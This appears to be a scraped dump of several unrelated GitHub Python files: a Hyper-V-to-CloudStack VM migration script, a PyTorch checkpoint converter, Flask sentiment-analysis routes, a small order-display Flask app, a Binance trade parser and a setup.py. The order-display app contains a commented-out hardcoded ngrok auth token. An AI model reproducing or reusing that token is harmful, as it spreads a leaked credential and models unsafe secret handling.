'default_service_offering'):\r\n\t\t\t\tvms[vm_id]['cs_service_offering'] = self.confMgr.get('CLOUDSTACK', 'default_service_offering')\r\n\r\n\r\n\t\t\t# make sure we have a complete config before we start\r\n\t\t\tif ('cs_zone' in vms[vm_id] and 'cs_domain' in vms[vm_id] and 'cs_account' in vms[vm_id] and 'cs_network' in vms[vm_id] and 'cs_service_offering' in vms[vm_id]):\r\n\t\t\t\t# manage the disks\r\n\t\t\t\tif 'src_disks' in vms[vm_id] and len(vms[vm_id]['src_disks']) > 0:\r\n\t\t\t\t\t# register the first disk as a template since it is the root disk\r\n\t\t\t\t\tself.log.info('Creating template for root volume \\'%s\\'...' % (vms[vm_id]['src_disks'][0]['name']))\r\n\t\t\t\t\ttemplate = cs.request(dict({\r\n\t\t\t\t\t\t'command':'registerTemplate',\r\n\t\t\t\t\t\t'name':vms[vm_id]['src_disks'][0]['name'].replace(' ', '-'),\r\n\t\t\t\t\t\t'displaytext':vms[vm_id]['src_disks'][0]['name'],\r\n\t\t\t\t\t\t'format':'VHD',\r\n\t\t\t\t\t\t'hypervisor':'Hyperv',\r\n\t\t\t\t\t\t'ostypeid':'138', # None\r\n\t\t\t\t\t\t'url':vms[vm_id]['src_disks'][0]['url'],\r\n\t\t\t\t\t\t'zoneid':vms[vm_id]['cs_zone'],\r\n\t\t\t\t\t\t'domainid':vms[vm_id]['cs_domain'],\r\n\t\t\t\t\t\t'account':vms[vm_id]['cs_account']\r\n\t\t\t\t\t}))\r\n\t\t\t\t\tif template:\r\n\t\t\t\t\t\tself.log.info('Template \\'%s\\' created...' % (template['template'][0]['id']))\r\n\t\t\t\t\t\tvms[vm_id]['cs_template_id'] = template['template'][0]['id']\r\n\t\t\t\t\t\timported = True\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tself.handleError('ERROR: Check the \"%s\" log for details' % (self.confMgr.get('CLOUDSTACK', 'log_file')))\r\n\r\n\t\t\t\t\t# check if there are data src_disks\r\n\t\t\t\t\tif len(vms[vm_id]['src_disks']) > 1:\r\n\t\t\t\t\t\t# upload the remaining src_disks as volumes\r\n\t\t\t\t\t\tfor disk in vms[vm_id]['src_disks'][1:]:\r\n\t\t\t\t\t\t\timported = False # reset because we have more to do...\r\n\t\t\t\t\t\t\tself.log.info('Uploading data volume \\'%s\\'...' % (disk['name']))\r\n\t\t\t\t\t\t\tvolume = cs.request(dict({\r\n\t\t\t\t\t\t\t\t'command':'uploadVolume',\r\n\t\t\t\t\t\t\t\t'name':disk['name'].replace(' ', '-'),\r\n\t\t\t\t\t\t\t\t'format':'VHD',\r\n\t\t\t\t\t\t\t\t'url':disk['url'],\r\n\t\t\t\t\t\t\t\t'zoneid':vms[vm_id]['cs_zone'],\r\n\t\t\t\t\t\t\t\t'domainid':vms[vm_id]['cs_domain'],\r\n\t\t\t\t\t\t\t\t'account':vms[vm_id]['cs_account']\r\n\t\t\t\t\t\t\t}))\r\n\t\t\t\t\t\t\tif volume and 'jobresult' in volume and 'volume' in volume['jobresult']:\r\n\t\t\t\t\t\t\t\tvolume_id = volume['jobresult']['volume']['id']\r\n\t\t\t\t\t\t\t\tself.log.info('Volume \\'%s\\' uploaded...' % (volume_id))\r\n\t\t\t\t\t\t\t\tif 'cs_volumes' in vms[vm_id]:\r\n\t\t\t\t\t\t\t\t\tvms[vm_id]['cs_volumes'].append(volume_id)\r\n\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\tvms[vm_id]['cs_volumes'] = [volume_id]\r\n\t\t\t\t\t\t\t\timported = True\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tself.handleError('ERROR: Check the \"%s\" log for details' % (self.confMgr.get('CLOUDSTACK', 'log_file')))\r\n\t\t\telse:\r\n\t\t\t\tself.handleError('We are missing settings fields for %s' % (vms[vm_id]['hyperv_vm_name']))\r\n\r\n\t\t\tif imported:\r\n\t\t\t\t### Update the running-hyperv.conf file\r\n\t\t\t\tself.confMgr.refresh()\r\n\t\t\t\tvms[vm_id]['migrationState'] = 'imported'\r\n\t\t\t\tself.updateVms(vms)\r\n\t\t\t\tself.confMgr.updateRunningConfig()\r\n\r\n\t# run the actual migration\r\n\tdef launch_vm(self, vm_id):\r\n\t\tself.log.info('\\n\\n----------------------------\\n-- LAUNCHING IMPORTED VMS --\\n----------------------------')\r\n\t\t# go through the imported VMs and start them and attach their volumes if they have any\r\n\t\tself.confMgr.refresh()\r\n\t\tif not self.confMgr.getboolean('STATE', 'migrate_error'):\r\n\t\t\tvms = json.loads(self.confMgr.get('STATE', 'vms'))\r\n\t\t\tif vms[vm_id]['migrationState'] != 'imported':\r\n\t\t\t\tself.handleError(\"Error: VM %d cannot be launched as it is not yet imported. Skipping the launch process...\" % vm_id)\r\n\t\t\t\treturn\r\n\t\t\tself.log.info('LAUNCHING %s' % (vms[vm_id]['clean_name']))\r\n\t\t\tpoll = 1\r\n\t\t\thas_error = False\r\n\t\t\tself.log.info(\"migrationState is: %s\" % (vms[vm_id]['migrationState']))\r\n\t\t\twhile not has_error and vms[vm_id]['migrationState'] != 'launched':\r\n\t\t\t\t# for i, vm in enumerate(vms):\r\n\t\t\t\t# vm_id = hashlib.sha1(vm['hyperv_server']+\"|\"+vm['hyperv_vm_name']).hexdigest()\r\n\t\t\t\tisAVm = 'cs_service_offering' in vms[vm_id]\r\n\t\t\t\tself.log.info(\"__________%s is a vm: %s________________________\" % (vm_id, isAVm))\r\n\t\t\t\tif 'cs_service_offering' in vms[vm_id]:\r\n\t\t\t\t\tself.log.info(\"__________processing vm: %s________________________\" % vm_id)\r\n\t\t\t\t\t# check if the template has finished downloading...\r\n\t\t\t\t\ttemplate = cs.request(dict({\r\n\t\t\t\t\t\t'command':'listTemplates', \r\n\t\t\t\t\t\t'listall':'true', \r\n\t\t\t\t\t\t'templatefilter':'self', \r\n\t\t\t\t\t\t'id':vms[vm_id]['cs_template_id']\r\n\t\t\t\t\t}))\r\n\t\t\t\t\tif template and 'template' in template and len(template['template']) > 0:\r\n\t\t\t\t\t\tif template['template'][0]['isready']: # template is ready\r\n\t\t\t\t\t\t\tvolumes_ready = True\r\n\t\t\t\t\t\t\tif 'cs_volumes' in vms[vm_id] and len(vms[vm_id]['cs_volumes']) > 0: # check if volumes are ready\r\n\t\t\t\t\t\t\t\tfor volume_id in vms[vm_id]['cs_volumes']:\r\n\t\t\t\t\t\t\t\t\tvolume = cs.request(dict({\r\n\t\t\t\t\t\t\t\t\t\t'command':'listVolumes', \r\n\t\t\t\t\t\t\t\t\t\t'listall':'true', \r\n\t\t\t\t\t\t\t\t\t\t'id':volume_id\r\n\t\t\t\t\t\t\t\t\t}))\r\n\t\t\t\t\t\t\t\t\tif volume and 'volume' in volume and len(volume['volume']) > 0:\r\n\t\t\t\t\t\t\t\t\t\t# check the state of the volume\r\n\t\t\t\t\t\t\t\t\t\tif volume['volume'][0]['state'] != 'Uploaded' and volume['volume'][0]['state'] != 'Ready':\r\n\t\t\t\t\t\t\t\t\t\t\tself.log.info('%s: %s is waiting for volume \\'%s\\', current state: %s' % \r\n\t\t\t\t\t\t\t\t\t\t\t\t(poll, vms[vm_id]['hyperv_vm_name'], volume['volume'][0]['name'], volume['volume'][0]['state']))\r\n\t\t\t\t\t\t\t\t\t\t\tvolumes_ready = False\r\n\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\tvolumes_ready = volumes_ready and True # propogates False if any are False\r\n\t\t\t\t\t\t\t# everything should be ready for this VM to be started, go ahead...\r\n\t\t\t\t\t\t\tif volumes_ready:\r\n\t\t\t\t\t\t\t\tself.log.info('%s: %s is ready to launch...' % (poll, vms[vm_id]['hyperv_vm_name']))\r\n\t\t\t\t\t\t\t\tself.log.info('Launching VM \\'%s\\'...' % (vms[vm_id]['hyperv_vm_name'].replace(' ', '-')))\r\n\t\t\t\t\t\t\t\t# create a VM instance using the template\r\n\t\t\t\t\t\t\t\trequestedIpAddress = vms[vm_id]['cs_ip_address']\r\n\t\t\t\t\t\t\t\tif (requestedIpAddress and len(requestedIpAddress.strip()) > 0):\r\n\t\t\t\t\t\t\t\t\tcmd = dict({\r\n\t\t\t\t\t\t\t\t\t\t'command':'deployVirtualMachine',\r\n\t\t\t\t\t\t\t\t\t\t'displayname':vms[vm_id]['hyperv_vm_name'].replace(' ', '-').replace('_', '-'),\r\n\t\t\t\t\t\t\t\t\t\t'templateid':vms[vm_id]['cs_template_id'],\r\n\t\t\t\t\t\t\t\t\t\t'serviceofferingid':vms[vm_id]['cs_service_offering'],\r\n\t\t\t\t\t\t\t\t\t\t'zoneid':vms[vm_id]['cs_zone'],\r\n\t\t\t\t\t\t\t\t\t\t'domainid':vms[vm_id]['cs_domain'],\r\n\t\t\t\t\t\t\t\t\t\t'ipaddress':vms[vm_id]['cs_ip_address'],\r\n\t\t\t\t\t\t\t\t\t\t'account':vms[vm_id]['cs_account']\r\n\t\t\t\t\t\t\t\t\t})\r\n\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\tcmd = dict({\r\n\t\t\t\t\t\t\t\t\t\t'command':'deployVirtualMachine',\r\n\t\t\t\t\t\t\t\t\t\t'displayname':vms[vm_id]['hyperv_vm_name'].replace(' ', '-').replace('_', '-'),\r\n\t\t\t\t\t\t\t\t\t\t'templateid':vms[vm_id]['cs_template_id'],\r\n\t\t\t\t\t\t\t\t\t\t'serviceofferingid':vms[vm_id]['cs_service_offering'],\r\n\t\t\t\t\t\t\t\t\t\t'zoneid':vms[vm_id]['cs_zone'],\r\n\t\t\t\t\t\t\t\t\t\t'domainid':vms[vm_id]['cs_domain'],\r\n\t\t\t\t\t\t\t\t\t\t'account':vms[vm_id]['cs_account']\r\n\t\t\t\t\t\t\t\t\t})\r\n\r\n\t\t\t\t\t\t\t\t# if vms[vm_id]['cs_zone_network'] == 'advanced': # advanced: so pass the networkids too\r\n\t\t\t\t\t\t\t\tif 'cs_network' in vms[vm_id] and vms[vm_id]['cs_network'] != '':\r\n\t\t\t\t\t\t\t\t\t# all_networkIds = [vms[vm_id]['cs_network'], vms[vm_id]['cs_additional_networks']]\r\n\t\t\t\t\t\t\t\t\tall_networkIds = vms[vm_id]['cs_network']\r\n\t\t\t\t\t\t\t\t\tcmd['networkids'] = \",\".join(all_networkIds)\r\n\t\t\t\t\t\t\t\t\tself.log.info(\"_____networks: %s_________\" % cmd['networkids'])\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t\tcs_vm = cs.request(cmd) # launch the VM\r\n\t\t\t\t\t\t\t\tif cs_vm and 'jobresult' in cs_vm and 'virtualmachine' in cs_vm['jobresult']:\r\n\t\t\t\t\t\t\t\t\t# attach the data volumes to it if there are data volumes\r\n\t\t\t\t\t\t\t\t\tif 'cs_volumes' in vms[vm_id] and len(vms[vm_id]['cs_volumes']) > 0:\r\n\t\t\t\t\t\t\t\t\t\tfor volume_id in vms[vm_id]['cs_volumes']:\r\n\t\t\t\t\t\t\t\t\t\t\tself.log.info('Attaching vol:%s to vm:%s ...' % (volume_id, cs_vm['jobresult']['virtualmachine']['id']))\r\n\t\t\t\t\t\t\t\t\t\t\tattach = cs.request(dict({\r\n\t\t\t\t\t\t\t\t\t\t\t'id':volume_id,\r\n\t\t\t\t\t\t\t\t\t\t\t'command':'attachVolume',\r\n\t\t\t\t\t\t\t\t\t\t\t'virtualmachineid':cs_vm['jobresult']['virtualmachine']['id']\r\n\t\t\t\t\t\t\t\t\t\t\t}))\r\n\r\n\t\t\t\t\t\t\t\t\t\t\tif attach and 'jobstatus' in attach and attach['jobstatus']:\r\n\t\t\t\t\t\t\t\t\t\t\t\tself.log.info('Successfully attached volume %s' % (volume_id))\r\n\t\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\t\tself.handleError('Failed to attach volume %s' % (volume_id))\r\n\t\t\t\t\t\t\t\t\t\t\t\thas_error = True\r\n\t\t\t\t\t\t\t\t\t\t\t\tself.confMgr.refresh()\r\n\t\t\t\t\t\t\t\t\t\t\t\tself.confMgr.updateOptions([('STATE', 'migrate_error', 'True')])\r\n\t\t\t\t\t\t\t\t\t\t\t\tself.updateVms(vms)\r\n\t\t\t\t\t\t\t\t\t\t\t\tself.confMgr.updateRunningConfig()\r\n\t\t\t\t\t\t\t\t\t\tif not has_error:\r\n\t\t\t\t\t\t\t\t\t\t\tself.log.info('Rebooting the VM to make the attached volumes visible...')\r\n\t\t\t\t\t\t\t\t\t\t\treboot = cs.request(dict({\r\n\t\t\t\t\t\t\t\t\t\t\t\t'command':'rebootVirtualMachine', \r\n\t\t\t\t\t\t\t\t\t\t\t\t'id':cs_vm['jobresult']['virtualmachine']['id']}))\r\n\t\t\t\t\t\t\t\t\t\t\tif reboot and 'jobstatus' in reboot and reboot['jobstatus']:\r\n\t\t\t\t\t\t\t\t\t\t\t\tself.log.info('VM rebooted')\r\n\t\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\t\tself.handleError('VM did not reboot. Check the VM to make sure it came up correctly.')\r\n\t\t\t\t\t\t\t\t\tif not has_error:\r\n\t\t\t\t\t\t\t\t\t\t### Update the running-hyperv.conf file\r\n\t\t\t\t\t\t\t\t\t\tself.confMgr.refresh() # make sure we have everything from this file already\r\n\t\t\t\t\t\t\t\t\t\tvms[vm_id]['cs_vm_id'] = cs_vm['jobresult']['virtualmachine']['id']\r\n\t\t\t\t\t\t\t\t\t\tvms[vm_id]['migrationState'] = 'launched'\r\n\t\t\t\t\t\t\t\t\t\tif (requestedIpAddress):\r\n\t\t\t\t\t\t\t\t\t\t\tlaunchedIpAddress = cs_vm['jobresult']['virtualmachine']['nic'][0]['ipaddress']\r\n\t\t\t\t\t\t\t\t\t\t\tprint(\"IP address %s:%s ==> %s:%s. \" % (vm_id, requestedIpAddress, vms[vm_id]['cs_vm_id'], launchedIpAddress))\r\n\t\t\t\t\t\t\t\t\t\t\tself.log.info(\"IP address %s:%s ==> %s:%s. \" % (vm_id, requestedIpAddress, vms[vm_id]['cs_vm_id'], launchedIpAddress))\r\n\t\t\t\t\t\t\t\t\t\t\tif (launchedIpAddress != requestedIpAddress):\r\n\t\t\t\t\t\t\t\t\t\t\t\tself.handleError(\"VM %s is launched with IP address: %s (not with %s)\" % (vms[vm_id]['cs_vm_id'], launchedIpAddress, requestedIpAddress))\r\n\t\t\t\t\t\t\t\t\t\tself.updateVms(vms)\r\n\t\t\t\t\t\t\t\t\t\tself.confMgr.updateRunningConfig()\r\n\r\n\t\t\t\t\t\t\t\telif cs_vm and 'jobresult' in cs_vm and 'errortext' in cs_vm['jobresult']:\r\n\t\t\t\t\t\t\t\t\tself.handleError('%s failed to start! ERROR: %s' % (vms[vm_id]['hyperv_vm_name'], cs_vm['jobresult']['errortext']))\r\n\t\t\t\t\t\t\t\t\thas_error = True\r\n\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\tself.handleError('%s did not Start or Error correctly...' % (vms[vm_id]['hyperv_vm_name']))\r\n\t\t\t\t\t\t\t\t\thas_error = True\r\n\t\t\t\t\t\t\t\t\t\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tif ('status' in template['template'][0]):\r\n\t\t\t\t\t\t\tself.log.info('%s: %s is waiting for template, current state: %s'% (poll, vms[vm_id]['clean_name'], template['template'][0]['status']))\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\thas_error = True\r\n\t\t\t\t\t\t\tself.handleError('%s: %s is waiting for template, current state not known.'% (poll, vms[vm_id]['clean_name']))\r\n\t\t\t\t\t\t\tself.handleError(template['template'][0])\r\n\r\n\t\t\t\tif vms[vm_id]['migrationState'] != 'launched':\r\n\t\t\t\t\tself.log.info('... polling ...')\r\n\t\t\t\t\tpoll = poll + 1\r\n\t\t\t\t\ttime.sleep(10)\r\n\t\t\tif not has_error: # complete the migration...\r\n\t\t\t\tself.confMgr.refresh()\r\n\t\t\t\tvms = json.loads(self.confMgr.get('STATE', 'vms'))\r\n\t\t\t\t# save the updated state\r\n\t\t\t\tvms[vm_id]['migrationState'] = 'migrated'\r\n\t\t\t\tself.updateVms(vms)\r\n\t\t\t\tmigrate = json.loads(self.confMgr.get('STATE', 'migrate'))\r\n\t\t\t\tmigrate.remove(vm_id)\r\n\t\t\t\tself.confMgr.updateOptions([('STATE', 'migrate', migrate)])\r\n\t\t\t\tself.confMgr.updateRunningConfig()\r\n\t\t\t\tself.log.info('SUCCESSFULLY MIGRATED %s to %s\\n\\n' % (vms[vm_id]['src_name'], vms[vm_id]['clean_name']))\r\n\t\telse:\r\n\t\t\tself.log.info('An error has occured. Skipping the launch process...')\r\n\r\n# vms[i]['migrationState'] = 'launched'\r\n\t\t### clean up the running-hyperv.conf file...\r\n\t\t#os.remove('./running-hyperv.conf')\r\n\r\n\tdef handleError(self, e):\r\n\t\tself.commonService.handleError(e)\r\n\r\n\t# run the actual migration\r\n\tdef do_migration(self):\r\n\t\ttry:\r\n\t\t\tself.commonService.beforeMigrationSetup()\r\n\t\t\tself.confMgr.refresh()\r\n\t\t\tvms = json.loads(self.confMgr.get('STATE', 'vms'))\r\n\t\t\tmigrate = json.loads(self.confMgr.get('STATE', 'migrate'))\r\n\t\t\tfor vm_id in migrate[:]: # makes a copy of the list so we can delete from the original\r\n\t\t\t\tself.log.info(\"starting migration for %s. migrationState: %s \" % (vm_id, vms[vm_id]['migrationState']))\r\n\t\t\t\tif self.confMgr.getboolean('STATE', 'migrate_error'):\r\n\t\t\t\t\tbreak\r\n\t\t\t\tmigrationState = vms[vm_id]['migrationState']\r\n\t\t\t\tif migrationState == '' or migrationState == 'migrated':\r\n\t\t\t\t\tself.export_vm(vm_id)\r\n\t\t\t\t\tself.import_vm(vm_id)\r\n\t\t\t\t\tself.launch_vm(vm_id)\r\n\t\t\t\telif migrationState == 'exported':\r\n\t\t\t\t\tself.import_vm(vm_id)\r\n\t\t\t\t\tself.launch_vm(vm_id)\r\n\t\t\t\telif migrationState == 'imported':\r\n\t\t\t\t\tself.launch_vm(vm_id)\r\n\t\t\t\telif migrationState == 'launched':\r\n\t\t\t\t\tself.confMgr.refresh()\r\n\t\t\t\t\tvms = json.loads(self.confMgr.get('STATE', 'vms'))\r\n\t\t\t\t\tvms[vm_id]['migrationState'] = 'migrated'\r\n\t\t\t\t\tmigrate.remove(vm_id)\r\n\t\t\t\t\tself.confMgr.updateOptions([('STATE', 'vms', vms), ('STATE', 'migrate', migrate)], True)\r\n\t\t\t\t\tself.confMgr.updateRunningConfig()\r\n\t\texcept Exception as e:\r\n\t\t\tself.handleError(e)\r\n\t\t\ttraceback.print_exc()\r\n\t\t\tself.log.exception(\"Migration stopped with the following stacktrace:\")\r\n\t\tfinally:\r\n\t\t\tself.commonService.afterMigrationTeardown()\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\thypverMigrator = HypverMigrator(None)\r\n\thypverMigrator.do_migration()\r\n\r\n","repo_name":"chipchilders/migrate2cs","sub_path":"migrate_hyperv.py","file_name":"migrate_hyperv.py","file_ext":"py","file_size_in_byte":27760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4420150905","text":"import torch\nimport argparse\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-model', required=True, help=\"trained model prefix, also include dir, e.g. ../data/model-100\")\n\n args = parser.parse_args()\n\n model_path = args.model\n\n checkpoint = torch.load(model_path, map_location='cpu')\n assert 'args' in checkpoint\n assert 'model' in checkpoint\n args = checkpoint['args']\n model = checkpoint['model']\n\n checkpoint_new = {}\n model_new = {}\n\n for key in model.keys():\n # print(key)\n if 'decoder' in key and 'fc' in key:\n continue\n else:\n model_new[key] = model[key]\n\n checkpoint_new['args'] = args\n checkpoint_new['args'].arch = \"transformer_noffn_t2t_wmt_en_de\"\n checkpoint_new['model'] = model_new\n\n torch.save(checkpoint_new, 'checkpoint_noffn.pt')\n\n print(\"finished!\")","repo_name":"Lollipop321/mini-decoder-network","sub_path":"scripts/convert_to_noffn.py","file_name":"convert_to_noffn.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"381333792","text":"import os\nimport requests\nimport re\nimport json\nimport fnmatch\nfrom datetime import date, timedelta\nfrom flask import Blueprint, request, jsonify, json\nfrom dotenv import load_dotenv\nfrom flatten_json import flatten\nfrom pandas import json_normalize, DataFrame\nfrom time import sleep\n\nload_dotenv()\n\nsentiment_bp = Blueprint(\"sentiment_bp\", __name__, url_prefix='/sentiment_api')\n\nSENTIMENT_KEY = os.environ.get(\"MEANING_CLOUD_API_KEY\")\nSENTIMENT_URL = 'https://api.meaningcloud.com/sentiment-2.1'\nCONFIDENCE_CUTOFF = 85\n\n\ndef remove_beg_end_punctuation(s):\n i, j = 0, 0\n while i <= len(s)-1 and not s[i].isalnum():\n i += 1\n\n if i >= len(s)-1:\n return ''\n\n s = s[i:][::-1]\n while j <= len(s)-1 and not s[j].isalnum():\n j += 1\n\n new_word = s[j:][::-1]\n last_two_letters = new_word[len(new_word)-2:]\n if last_two_letters == \"’s\" or last_two_letters[0] == '@':\n return new_word[:len(new_word)-2]\n return new_word\n\n\n# @sentiment_bp.route('/flatten', methods=['GET'])\ndef flatten_json(input):\n flattened_json = flatten(input)\n texts = [key for key, val in flattened_json.items() if key.endswith('text')]\n forms = [key for key, val in flattened_json.items() if key.endswith('form')]\n\n output, keys = [], set()\n\n for text in texts:\n if text[:len(text)-4]+'score_tag' in flattened_json and text[:len(text)-4]+'confidence' in flattened_json:\n text_sentiment = {\n \"text\": remove_beg_end_punctuation(flattened_json[text]),\n \"score_tag\": flattened_json[text[:len(text)-4]+'score_tag'],\n \"confidence\": flattened_json[text[:len(text)-4]+'confidence'],\n }\n\n if text_sentiment[\"text\"] and text_sentiment[\"text\"] not in keys and int(text_sentiment[\"confidence\"]) >= CONFIDENCE_CUTOFF and text_sentiment[\"score_tag\"] != \"NONE\":\n output.append(text_sentiment)\n keys.add(text_sentiment[\"text\"])\n\n for form in forms:\n\n if re.search('sentimented_concept_list', form):\n list_name = 'sentimented_concept_list'\n elif re.search('sentimented_entity_list', form):\n list_name = 'sentimented_entity_list'\n\n res = [m.start() for m in re.finditer(list_name, form)][-1]\n\n form_sentiment = {\n \"text\" : remove_beg_end_punctuation(flattened_json[form]),\n \"confidence\": flattened_json[form[:res]+'confidence'],\n \"score_tag\": flattened_json[form[:len(form)-4]+'score_tag']\n }\n\n if form_sentiment[\"text\"] and form_sentiment[\"text\"] not in keys and form_sentiment[\"score_tag\"] != 'NONE' and int(form_sentiment[\"confidence\"]) >= CONFIDENCE_CUTOFF:\n output.append(form_sentiment)\n keys.add(form_sentiment[\"text\"])\n\n return output\n\n# sentence_list > segment_list > polarity_term_list > sentimented_concept_list\n# sentence_list > segment_list > polarity_term_list > sentimented_concept_list > sentimented_entity_list\n\n# @sentiment_bp.route('/flatten', methods=['GET'])\ndef return_sentiment(text):\n if text[\"agreement\"] == \"DISAGREEMENT\":\n return False\n\n sentiment = {\n \"text\": text[\"sentence_list\"][0][\"text\"],\n \"confidence\": text[\"confidence\"],\n \"irony\": text[\"irony\"],\n \"score_tag\": text[\"score_tag\"]\n }\n\n return sentiment\n\n\n# @sentiment_bp.route('', methods=['GET'])\ndef get_sentiment(text_input):\n params = {\n 'key': SENTIMENT_KEY,\n 'txt': text_input,\n 'lang': \"en\"\n }\n\n try:\n sleep(1)\n response = requests.post(\n SENTIMENT_URL,\n data=params\n )\n\n except requests.exceptions.RequestException as e:\n return (e)\n\n text = response.json()\n\n if text[\"agreement\"] == \"DISAGREEMENT\" or text[\"score_tag\"] == \"NONE\" or int(text[\"confidence\"]) < CONFIDENCE_CUTOFF:\n return False, False\n\n sentiment_headline = {\n \"text\": text[\"sentence_list\"][0][\"text\"],\n \"confidence\": text[\"confidence\"],\n \"irony\": text[\"irony\"],\n \"score_tag\": text[\"score_tag\"]\n }\n\n sentiment = flatten_json(text)\n\n return sentiment_headline, sentiment","repo_name":"hannahtan96/volatile-back-end","sub_path":"app/routes/sentiment_routes.py","file_name":"sentiment_routes.py","file_ext":"py","file_size_in_byte":4164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20304253853","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\nimport json, os, requests, shutil\nfrom datetime import datetime, timedelta\nfrom flask import Flask, jsonify, make_response, Response, request, redirect, session, url_for, render_template, __version__\n#from pyngrok import ngrok\n\n\n###############\n## App Setup ##\n###############\n\n# FLASK #\nAPP_NAME = 'showOrder'\nSTATIC_DIR = os.path.join(os.path.dirname(__file__), 'static')\napp = Flask(__name__, static_folder=STATIC_DIR)\n\n\n# NGROK #\n# ngrok.set_auth_token(\"1lkRMJVY5ULy72xJIQ2pVgbCvY5_6CNYvbLDmsk4bbKkNx1WY\")\n# http_tunnel = ngrok.connect('https://localhost:5000/', bind_tls=True)\n\n\n############\n## ROUTES ##\n############\n\n@app.route('/')\ndef home():\n print(\"> > > MAIN < < <\")\n return render_template('index.html', flask_ver=__version__)\n\n@app.route(\"/get_order\", methods=['POST','GET'])\ndef get_order():\n print(\"> > > GET ORDER < < <\")\n #order_data = request.json\n #order_url = order_data['value'][0]['order_url']\n order_url = 'http://www.google.com/index.html'\n\n r = requests.get(order_url, allow_redirects=True)\n open('static/show_order_data.html', 'wb').write(r.content)\n\n print(order_url)\n return Response(status=200, content_type=\"text/plain\")\n\n@app.route(\"/door_closed\", methods=['GET','POST'])\ndef door_closed():\n print(\"> > > DOOR CLOSED < < <\")\n original = 'static/tinybreadbox_logo.html'\n target = 'static/show_order_data.html'\n shutil.copyfile(original, target)\n return Response(status=200, content_type=\"text/plain\")\n\n\n##########\n## MISC ##\n##########\n\n# @app.errorhandler(404)\n# def not_found(error):\n # return make_response(jsonify({'error': 'Not found'}), 404)\n \nif __name__ == '__main__':\n app.run() #host='0.0.0.0', ssl_context='adhoc'","repo_name":"reeebot/showOrder","sub_path":"app_bkp.py","file_name":"app_bkp.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70581994810","text":"from decimal import Decimal\nfrom datetime import datetime\nfrom document_parser import DocumentParser\n\n\nclass BinanceXlsxParser(DocumentParser):\n # WARNING: You must download your \"Trade History\" from Binance, **NOT** \"Order History\" \n # Order History has a completely different formatting which will not work. \n def __init__(self, *args, **kwargs):\n kwargs['exchange_name'] = 'binance'\n kwargs['header'] = {\n 'created_at': 'Date(UTC)',\n 'amount': 'Amount',\n 'fill_amount': 'Total',\n 'currency_pair': 'Market',\n 'type': 'Type',\n 'price': 'Price',\n }\n kwargs['header_rows'] = 0\n super(BinanceXlsxParser, self).__init__(*args, **kwargs)\n\n def process_row(self, row):\n row['created_at'] = self.process_date(row)\n row['currency_pair'] = self.process_currency_pair(row)\n row['type'] = row['type'].lower()\n\n for key in ('amount', 'fill_amount', 'price'):\n row[key] = abs(Decimal(row[key]))\n return row\n\n def process_date(self, row):\n _date = row['created_at']\n if isinstance(_date, str):\n return datetime.strptime(_date, '%Y-%m-%d %H:%M:%S')\n if isinstance(_date, date):\n return datetime(_date.year, _date.month, _date.day)\n else:\n return _date\n\n def process_currency_pair(self, row):\n # WARNING: If USD is added to the quote pair, we'll need to change how we parse pairs below\n # because pair[-3:] will match USD even if it's TUSD, etc. \n quote_pairs = ['USDC', 'USDT', 'TUSD', 'BUSD', 'DAI', 'BTC', 'ETH']\n pair = row['currency_pair']\n\n if pair[-3:] in quote_pairs:\n first = pair[:-3] \n last = pair[-3:]\n elif pair[-4:] in quote_pairs:\n first = pair[:-4] \n last = pair[-4:]\n else:\n raise Exception('Binance quote pair is not one of {}'.format(quote_pairs))\n\n if first == 'BCC':\n first = 'BCH'\n return first + \"-\" + last\n","repo_name":"justinmart/simple_taxes","sub_path":"exchange_parsers/binance_xlsx.py","file_name":"binance_xlsx.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"77"} +{"seq_id":"25726360349","text":"from setuptools import setup, find_packages\n\ntry:\n from pypandoc import convert\n read_md = lambda f: convert(f, 'rst')\nexcept ImportError:\n print(\"warning: pypandoc module not found, could not convert Markdown to RST\")\n read_md = lambda f: open(f, 'r').read()\n\n__version__ = None\nexec(open('pyvt/_version.py').read()) # load the actual __version__\n\nsetup(\n name='pyvt',\n version=__version__,\n maintainer='Arman Noroozian',\n maintainer_email='arman.noroozian.developer@gmail.com',\n url='https://github.com/anoroozian/pyvt',\n description='Python VirusTotal Private API 2.0 Implementation.',\n long_description=read_md('README.md'),\n license='MIT',\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Security',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n ],\n keywords='virustotal api private',\n # py_modules=['__init__', '_version'],\n packages=find_packages(exclude=['tests', 'tests.*']),\n include_package_data=True,\n tests_require=['nose', 'coverage'],\n zip_safe=False,\n test_suite='nose.collector',\n # packages=find_packages(exclude=['tests', 'tests.*']),\n # setup_requires=[],\n install_requires=['requests'],\n # data_files=[],\n # scripts=[],\n # 